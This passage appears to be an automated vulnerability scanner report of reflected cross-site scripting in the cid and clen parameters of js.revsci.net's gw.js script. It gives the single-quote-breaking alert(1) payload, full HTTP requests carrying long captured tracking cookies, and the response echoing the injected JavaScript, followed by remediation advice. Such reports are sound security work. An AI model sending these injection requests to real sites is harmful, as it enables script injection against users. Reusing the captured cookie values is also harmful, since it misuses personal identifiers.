The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51753'%3balert(1)//73b5054d4bc was submitted in the cid parameter. This input was echoed as 51753';alert(1)//73b5054d4bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=432&vid=6127792&pid=456378&pli=2120305&sid=1887835&ali=3130307&cid=951837851753'%3balert(1)//73b5054d4bc&p=275&ref=http%3A//d.tradex.openx.com/afr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Di& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_POOa="MLsXtSHtJzpvJ5G+ytKgurD8xZbguKBAUoXMlOhbDZEIyUnXvCY/f7eEYgF17PuoYfq5CEudAjRL1GbcO/7J60JGGit5YpjkTi94QZ++NpMovzSXDH2egifUZfAGA4x6DJ1ef7CxdWNM1Ath6aEIxixI6X+ZFnchP7su1AfMVdmbt4uXOwFbARuez9yGUILljsr8iZpbE0YOpDX/I8dVzRiqWCbJWrig0+Ygf+aONwJLVAG9Qci4qyJ0OEoyF/C9WVXIsdxjo58DG+M5Z24kOQTzZzl9WL1fBtLwQMgZBQn3zjpdo1exh0bsmOsoJq0J12qVAbFThsQz5IDt7CkQiyleF6OSs84OYdv+QMiLgpV9FRrdszNyJ1Z1zdWSL2eBUsGyJ9LgmSypFoj2IJYq+CYjKuJh1q5SotTKfyoRjtQMIlYaw1bYORoY2KsywkRFoyeuXaDHr+kubAEaiR4mv+ueQqOTBqIL8EaJVKNeK14CvyaGEGiOf4xVidLPtWVp2cvmx+x8USaJltoPt52X7Qo3G9b5gMMSX/O7j4QHvGs068mYD7Jt0w3zVBoiChmjJijUOZI7pBIcB7pcDyhPXu0ekU8FNf+EZ2maUs/pJNfuLWhxzdwV8IFJvoDuP/k2F1fAFaKV5m3tJu4Kbsthsmobn+AEKG1fmaDEW/Rl9s4FMKHX6d1NaUg1aGoUNW9vlSNUkNQyg5xbyIqlIG60UCqagEd7akjIlHqEKgyVPmZRXCZsks8KUgS+ggIDyN3nm8Q9ybV7DYPDsaMVL9l30qTRehQMpViyu4aazqatyngUryJYSDMAw3MoxCYvzLg4VI0yQpDT4YM7EL/sjZF3GBKEvexarBUJ8IhXSEgBy8YPlIb7J1fU36Xok+aMd7hKisl1fiJ5L9WWlvPngVsNahS23h2ilcpGbvT7P8I1H67JHJs0T5zOxlbKA0tgt1XwzumjmY1MFQG7npmmjsejndnQNq6/1ECJ9acOs9TLs4eapvNZQ+7+XrqZbKo7Bg0R+TcmXPDWqHBSsNSRS6PEPs+B0Hn8vC43OULFX/VMEqBD7Um7K4PkKLzZ45EK/e7fMS47h1FG+y0pSm42Y6HkNkhnxCrDjBcgROJzznpsuIbJZQHyXl8j4cUgGiZBxqQSPqhFr9mtghL4GOwp2YKJAlwRxM+bjbCTXIMg2izcge98/uLVSVc1qMa6m03veDkqyKsoaPFeEkA2OOgtvIAoNV11Moc2Q+7bMZeZl4CDzl94tevQyhvCzcZDWHw1CA4qMQBfMOZr4xEG93vu+i9zYjr9xG1HA/txVLLWfK/bAKKmN6fqLbcY2pW5lpqW2FJxi65P63qhCJt0YP0gMlFmQMsihPn4MV2v59cKlKSELXAgqbss7TVL5/B0TuuGU260dpfoFfufumXLCpyIlXH1DRvhprlFYuymPmKAKQrrAUgRzvmuXaEHlH5jRUx1uEFjhqo7hOpqY+eQR+el8zb4xYyA0B3Fjnz5zUZGXZEUOHOUu5GVkR50a/qnzLWhgVLpMsIBeAsDZwR2196JkcyvgVxTSCglY6cvfSw1V+yzCTCmcXLsyRIBE5QZz41zi2x/Bw=="; rsi_us_1000000="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"; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rtc_k8KG=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; rsi_segs_1000000=pUP94zmhOXMMH/C1v6FY5BD9CU6duy7ESpLgzGDKYyViGwmWW18bAQsYoAM+8HjFdJtFJWRCiLHBLDbWsPcI86yrtpktmfFacilUsrkfIWWKJiDdQnsDK82st/RBdHlSiCArToI74iBMHEIM6aRZ+ctyPyV2AcskZoa93bnD+7KzmMsYNaQWBrrYkNUezvQnLXGkhVG05Odz4K2YkQ7efGHGdJsOKQEkcQBYjtqaS6H7ZlDNGWHeUbBT+7iWjqkltSlqdFkY5ZCSD/LpMe6oE2LhWxsHk9CQb4f/4DBRvVR+Vsn3Wa2otHHl9DcyWQkxt+HNZk80xAqzN7umu7qJn1io7bu4IlqZWRAwUL/2riYdQyqUN2xVKYYypoVq1rD+CHWBoax0NCsrkHXbllfg48mnErvVtscNhDauRsHqShGST1ntuJP8Y2uTzuL21JyFn9D8BzYJI7XWgqgHY3hwgF1X4Spu79NlxqFyDqacIxYDmgj/c/80HbjalDyO2MjzVEQUdlANyAYn0j8EbYmxQKxsM6Rx3taFnmBYEmerFK8BfqeoKPoaXWO+nwv0ryXCZUva1SDjlo2wVhjQ76dAQ1KhNRC+7n6erq2kuZ1UHS7gGJ+a8IPLnbMauEqtWz/vfr9PAbndBB364psLhQxsNBZ/V+G5/rjrxQ6XCrYppz+AmSwLTlzgnXYOZE+rGQrANefuO3zqAEj7Orx7bW+c7SVq/vKvEfxbwhQK4Bb0D6+TT7bmiEPzBBOMjJtdSmdMA/UlA/1ADQ==; udm_0=MLv3NyEJZjpr3xSpL/sKOUxICxpURCNKVG8JBfsMOWr4c1ruOor8IW57ubLruJ70uAvWzxrBuHPGjOV0Yl999w9PWZEwp6XsRgcj+GkbCgPiYv9OYis//qNYlXaQsRkv1/9n8rbpls3/lg3b/9yLcovhjH8xhVus+bOGmVMfi7o7gawXwNvz26uIS28JGVLlC25P0hSiX8y1K25Ud7EXnL8DDb8pkUWpjvKZpMzKbPpZV94WqnSr172thZ8syzScr9cZG9oqnzD7bqSMJL5BQKcgxSuou8ECw+GXnkdl4OmbY2FbSYlCDRgc+/c6lhFH7jE0YNiubrzPt27J/JEc0Gs+XkI+Ebd1WvYw9/Xd7ftCSDR0Zwe8AhR6iKptca2vjFNTTKo+OkkLJW2FIsLYkAONGVJ9hOmW5e084U7uw0vM+Lhdzw9TqVu5ygVCjUYWXFmCqrrrRk62v1d6cSVtIHFIJ4lePrRIuyqlN2ALWcWNJ2nVPNQCtG6Dh8DEERFi+XoP1wPFhC0GiF7wn0MHND/wCWXx/JWKUU+VC34cUxuUta3r3XuTvx4d+vBQXuDPDnw29QIFptXZW6fOOuymtApEj21aZsv0egu11Apu04LD/roZjbpAC6QGunZcYL9ssZpQjWQYMBZlGqIfgh3iuuWUsPHTBGUDt5cscdNfS7TKpmHXmthcbc/d7e+/MnAdrT/1ZehbDdCHZQeWj6mIfzSpZ8cC3Zk24ZglqRgwNFbilMuOn3DcO2ugB4zdEQcmVaaz6YHh+JNmmLMjl2TA24PK3xD+fbpmhzFvEBjIi7clvv9qOiJtouwDDd2RQYT2Ep3F/HnCv/GaCR4wdJNb6Izjx2OU4EC6SMnmhzRJZx1Mvbeyktq11Zi2w55ZWgZls7Q7wzCg65f8+2GBHdPcBi0xQFO8j756qtOn/3dAStKIMF35glzGEz2NyJbHKXBtkH2X19gpB6ax9rOyGogvW99/utdnqqUGrzn/kEpQnDa2kEUk811wVSbL6q60O/bbCiUNeKz3rRkQPFP8+aD6V0zGLjDPKncsy1hNjN1jRpSMXKxDqVRdpcYwttiPkWREhaInub+YWVtT1oXubfLiNHV9UJeD2k0fkb7r3mvCCEYCbYbJQQbyzKSxCaY/3lu5/BahDewpho2bntF1PV9ZAIHz13i3/QIFqKunfGZergISuHHcpD6S5AkX5oSnOVAymhcRYncJuDVR7w3F5RLVa7EHGecTDqlEvm59ZX8cTQ5bzJ1Abtx13XYb7j1u7zVIfeXneYS+0GlZAi3yogjdpiPiBw1EH7P9o/q1Zg7W9IkgH/YVzge06UUUK4rT1AoMaf8i7WK1YW21srH7XQ0Ot8fltujTte/8QbNhYbI7IG0rOSBbSov47vv3n6MjpPrAf5qhMAXLUGatxFcl4tsfOkACgIvhTn8I6rAXvEYYlNAxsCfXmnI0p8hQiJERchlgDMgmxns4Ly+e/p6PMLWHzPtN5c+q+g+IPQG377uaac8DJzK02AriShlM9dZKDYxgqlG+zJ24k7ffFdBB4+ibuSXB8ld6ZqZ1O9+R2LgBbwAuSwdkT4ftgIBysXBOapY6pYD+cT84SMwsgTEMDgtYrO7hiyO4Q+hxJwlkbjJNzvJXX1Y8JfAsyg8ZWg53ml7FrAz2kysF0CgU8P9ILnou5Ckc6kCRS2UU0ZoeR188Jg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMJZjpn3tvXt87R1yV3HOKlJulKw7Gjxf0Mm2YUYrin9+tmJOGnmxOUGUhVFxST7v4ELqlmW8tkA1p08J5yrbB1dzLkfbfpfXnlpuZIoxq/azLQku7xf+0Z446YCAXX88DKIMATvgWrmYCuFq8DvU62WGxeJsRTKV+zKLdc2Kss4QNPi+caOUK8opkodf0TUbqJuCPSErsWwFptLj4mCgBgRnREA6etTLqL8wCJhg/OBbpjPR+pVL3jaaccv7sx28vampWOGXT56NoEUBl3MqtzB1Gi95Pu+RcNBRyFe2G03qgYYaFn+nylud02KQW6QEDsZTtlMC50kcTKZAf5kxeFOuxORpr/JnJY5j38+J9d19frLV1ryag5eOLSAI8hdFyAG+7+6VPyCC5XJNu5vceg3nDULe7ligOOwQE2hHovI3/yOgMoyd0SIk2gpRNeHuNtZo6fhrtqdQkYT/37ZQV8cm2QtJlthLHeyEONPTEETtDIs2MNfxNbLVD59/JA+erPXI2Fnb4F+ppByvvhyfUF9KQ4IkxMjZA8aoSDueN2/egz3QWxgHdCLfnO/1Wh50alb6121iz8gBr77E0+KUe2YuWRkvOjfST+2I4ZfHoWkzI3o7GdIu/pUIF6NDTCJBEYwHvgeXLI5eJLE0jEpvdfF6JFp1xcYAhKPhH+YMJryf8aiuZ5pKxxFwrOuven/P26oPu+UFzzLr1fGZ5VErQCPOiGr3I7UrM4SIHPpHmCXJ+Ci9KTQOx83SEeG1qbRk6OANFDjh3XiHlehdKw+4sU3QrKEfCTkFsXFsYzWCloJx1hP1Dfyc7dtbea1Et76wkIvsNFJtYm9aBYybigaKufe6wLIxpnP2wbxjtATUsLCqW9xbtyHoS5CjAkzx0bJyiL2st9Ab3Zgmu2zIE0mdu8mlepVW0PnvbyKdWoh7aHm9QAPNux02ITwHF8W4CM2F7VNEspUxd45vc7ouIazj/2mKE5XTgt9eqyi9WDD+1xvG/9C7P2h+bvg00ETYyrePEapJE4X5+j79jPxMn8j9MZFVddSB3d8WnFGTa1u6f0dGlBHrWOGd4pQqrIT8x5U/AZeLuOVgVZt8hrYyYZL/A0DzBMFY/KSoYJEwW3Ly2MnDCvpQHlvdIoGjNHhTvwSpcyWa5TVaIgLIgY7cHayV01KtMzfxhqv5s9ZTzJ2D4HtGW2jDqMgyD3AFoPUVCHyvU+zZSeRFfwPTrqS7ATOVoyn/eottqgGoxVtqn3tBqt7AKBk7BSVxmTVukLEWCzIlnkdl3bEwfdxJ9ppIon61XLL5oCbPrTDa0HrPO+qA4AdUsS6DBA3SsheOdRtYQVtR7eoEqaux0MXI6NTLwqsj7Q4LRmge5sMOhz9ShqUacDrkBSVyP9Bv/9sobZ4jGLJyrCxU5sxMUiJE3vPdGTolSx6Tq7MeMkd4uIu6ROMAeYz7rluFc/Pmu5jrip+i/tWNG2l/7I4TmTbwcm+IKt6lq5TXIoZj5+RDXDGHQTUgbFnIVK7pN/tAJ9SHElsgqidYSI8ORJEPa8wIZLIVIWQMQE9e9sRNW8Sb+T3LWw89zXYZOX5t1midep30uh0Dnjca21JeTQ32IX4evpU5pG3MMCRDaSPpQNfUgKMPH8GF0lc60S3wScjDzfHJHIzm8Yt+oG4+lQ+2+xYvVYZxA6Qbdw8mgqp/VrRCPm4vjn40UYa6U6JQHAs95MdzOnKeHaQGUKfGU05kD2HYkgRPjG9m+xYPVY9yO6N9BpbpAWEG3J6lPQRTYSOjaRRH+dcEZ3bikVwJT7RXATyr4Cq8or+IdX6cjQB1GwTL1sPzVPdFffqf8ALJuFnphEm4G7CZtxF2Ot5y/fZil/vTI=; Domain=.revsci.net; Expires=Wed, 27-Jun-2012 03:01:01 GMT; Path=/
Last-Modified: Tue, 28 Jun 2011 03:01:01 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 28 Jun 2011 04:01:01 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 28 Jun 2011 03:01:01 GMT
Content-Length: 6236

//Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

A10868.DM_addEncToLoc('pid', '456378');
A10868.DM_addEncToLoc('pli', '2120305');
A10868.DM_addEncToLoc('sid', '1887835');
A10868.DM_addEncToLoc('ali', '3130307');
A10868.DM_addEncToLoc('cid', '951837851753';alert(1)//73b5054d4bc');
A10868.DM_addEncToLoc('p', '275');
A10868.DM_addEncToLoc('ref', 'http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517&cb=i');
function asi_addElem(e){var p=document.body==null?document.getEle
...[SNIP]...

1.307. http://js.revsci.net/gateway/gw.js [clen parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the clen request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26dd6'%3balert(1)//3232e73e367 was submitted in the clen parameter. This input was echoed as 26dd6';alert(1)//3232e73e367 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=43226dd6'%3balert(1)//3232e73e367&vid=6127792&pid=456378&pli=2120305&sid=1887835&ali=3130307&cid=9518378&p=275&ref=http%3A//d.tradex.openx.com/afr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Di& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=1887835
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_POOa="MLsXtSHtJzpvJ5G+ytKgurD8xZbguKBAUoXMlOhbDZEIyUnXvCY/f7eEYgF17PuoYfq5CEudAjRL1GbcO/7J60JGGit5YpjkTi94QZ++NpMovzSXDH2egifUZfAGA4x6DJ1ef7CxdWNM1Ath6aEIxixI6X+ZFnchP7su1AfMVdmbt4uXOwFbARuez9yGUILljsr8iZpbE0YOpDX/I8dVzRiqWCbJWrig0+Ygf+aONwJLVAG9Qci4qyJ0OEoyF/C9WVXIsdxjo58DG+M5Z24kOQTzZzl9WL1fBtLwQMgZBQn3zjpdo1exh0bsmOsoJq0J12qVAbFThsQz5IDt7CkQiyleF6OSs84OYdv+QMiLgpV9FRrdszNyJ1Z1zdWSL2eBUsGyJ9LgmSypFoj2IJYq+CYjKuJh1q5SotTKfyoRjtQMIlYaw1bYORoY2KsywkRFoyeuXaDHr+kubAEaiR4mv+ueQqOTBqIL8EaJVKNeK14CvyaGEGiOf4xVidLPtWVp2cvmx+x8USaJltoPt52X7Qo3G9b5gMMSX/O7j4QHvGs068mYD7Jt0w3zVBoiChmjJijUOZI7pBIcB7pcDyhPXu0ekU8FNf+EZ2maUs/pJNfuLWhxzdwV8IFJvoDuP/k2F1fAFaKV5m3tJu4Kbsthsmobn+AEKG1fmaDEW/Rl9s4FMKHX6d1NaUg1aGoUNW9vlSNUkNQyg